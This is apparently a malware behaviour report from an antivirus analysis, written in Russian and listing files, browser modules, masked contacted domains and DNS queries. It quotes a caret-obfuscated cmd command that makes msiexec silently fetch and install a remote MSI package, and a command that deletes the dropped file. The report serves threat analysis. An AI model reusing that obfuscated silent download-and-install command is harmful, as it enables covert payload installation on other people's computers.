Техническая информация
- '<SYSTEM32>\cmd.exe' /C m^SiE^x^e^c /i http://fa###finn.com/admin/556791.msi /qn
- %WINDIR%\explorer.exe
- iexplore.exe
- Процесс iexplore.exe, модуль wininet.dll
- Процесс firefox.exe, модуль nss3.dll
- %TEMP%\nagr6x2evh1h
- %TEMP%\idcwccu3sasromfk
- %TEMP%\nss6a67.tmp\ie2mi.dll
- %WINDIR%\installer\msi69dc.tmp
- 'fa###finn.com':80
- 'nu#####krimakassar.com':80
- 'jj###ths.com':80
- 'in######onsservicegroup.com':80
- 'sh####halkowich.com':80
- DNS ASK fa###finn.com
- DNS ASK nu#####krimakassar.com
- DNS ASK jj###ths.com
- DNS ASK in######onsservicegroup.com
- DNS ASK sh####halkowich.com
- '%WINDIR%\installer\msi69dc.tmp'
- '<SYSTEM32>\cmd.exe' /C m^SiE^x^e^c /i http://fa###finn.com/admin/556791.msi /qn' (со скрытым окном)
- '<SYSTEM32>\msiexec.exe' /i http://fa###finn.com/admin/556791.msi /qn
- '%WINDIR%\syswow64\wininit.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%WINDIR%\Installer\MSI69DC.tmp"